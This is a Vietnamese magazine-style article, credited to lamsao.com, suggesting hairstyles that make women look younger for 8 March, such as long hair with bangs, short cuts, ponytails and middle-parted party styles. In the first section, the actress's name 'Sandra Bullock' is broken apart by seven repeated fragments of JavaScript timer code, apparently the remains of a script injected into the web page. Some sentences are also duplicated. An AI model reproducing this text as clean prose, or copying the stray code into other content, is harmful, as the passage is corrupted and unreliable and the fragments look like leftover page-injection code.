Hướng dẫn các kiểu tóc làm bạn trẻ đẹp vào ngày 8/3

Khi có tuổi, mái tóc sẽ bớt sắc màu và độ sáng thế nên bạn phải chăm sóc chúng một cách cẩn thận, ngoài ra việc lựa chọn đúng kiểu tóc cũng sẽ giúp ích cho bạn rất nhiều trong việc làm trẻ hóa gương mặt. Dưới đây là một số mẫu tóc mà bạn có thể thử cho mình:

Tóc dài với mái bằng

Bản thân tóc dài luôn thể hiện nét trẻ trung, dịu dàng cho các bạn gái. Và khi kết hợp cùng với phần tóc mái bằng thì nó trở nên trẻ trung và sành điệu hơn.

Bản thân tóc dài luôn thể hiện nét trẻ trung, dịu dàng cho các bạn gái.

Tuy nhiên hãy thận trọng khi lựa chọn kiểu tóc này bởi lẽ nó cũng khá kén gương mặt. Ví dụ với khuôn mặt của S andom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);} andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);} andom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);} andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);} andom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);} andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);} andom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);} andra Bullock, mái tóc dài và phần tóc mái cắt bằng đã làm cho cô ấy trở nên thật trẻ trung và đầy sức sống. Một vài sợi tóc buông xung quanh gương mặt là cần thiết để tạo thêm nét tươi đẹp cho kiểu tóc này, tuy nhiên nó cần mỏng và rõ ràng. Mặt khác nếu bạn muốn để phần tóc mái thì nó cần phải là một đường cắt ngang bằng ngay ngắn để cho khuôn mặt trông đầy đặn hơn.
Đường cắt tóc ngắn

Bạn có thể lựa chọn mẫu tóc của Victoira Beckham.

Những kiểu tóc này giúp cho khuôn mặt bạn trông dài và thon mảnh hơn. Bên cạnh đó, những sợi tóc buông tự nhiên sẽ cho bạn một vẻ tươi mới, sành điệu và cũng rất cá tính. Hãy cẩn thận khi lựa chọn độ dài của mái tóc, bao gồm cả tóc bob. Nếu bạn vẫn muốn thử một kiểu tóc nào đó an toàn hơn theo phong cách này thì có thể lựa chọn mẫu tóc của Victoira Beckham.

Tóc đuôi ngựa

Vâng, kiểu tóc này xuát phát từ những cô nàng trung học nhí nhảnh và dễ thương. Tuy nhiên với một chút biến tấu, nó vẫn có thể phù hợp với một người phụ nữ trưởng thành nếu muốn gương mặt mình thon dài và thon mảnh hơn.

Tóc đuôi ngựa không chỉ dành cho những cô gái trung học mà cả các quý cô trưởng thành cũng rất phù hợp.

Kiểu tóc đuôi ngựa buộc cao với một vài lọn tóc buông rơi tự nhiên sẽ nâng lên vẻ đẹp tự nhiên cho bạn. Kiểu tóc đuôi ngựa không chỉ dùng trong cuộc sống thường ngày mà nó còn giúp bạn tỏa sáng trong những sự kiện đặc biệt.

Tóc tiệc tùng
Đường ngôi tóc rẽ giữa là một gợi ý tuyệt vời nếu bạn muốn che đôi má bầu bĩnh và kéo xa sự chú ý vào những gương mặt tròn. Bạn cũng có thể kéo một ít tóc ở phía trước ra sau, dùng kẹp ghim giữ và để một vài lọn tóc rơi xuống mái. Và với cách tạo kiểu này, gương mặt bạn chắc chắn sẽ trở nên tươi trẻ hơn.

Đường ngôi tóc rẽ giữa là một gợi ý tuyệt vời nếu bạn muốn che đôi má bầu bĩnh và kéo xa sự chú ý vào những gương mặt tròn.

Trên đó là một số kiểu tóc đơn giản và quen thuộc có thể thay đổi rất nhiều đến vẻ ngoại hình, giúp bạn có được gương mặt trẻ hơn, mảnh mai hoặc căng đầy hơn. Chính vì vậy hãy tìm hiểu các đường nét trên gương mặt để sử dụng mái tóc như là công cụ để bạn che đi những khiếm khuyết hoặc làm nổi bật vẻ đẹp của mình hơn.

Theo lamsao.com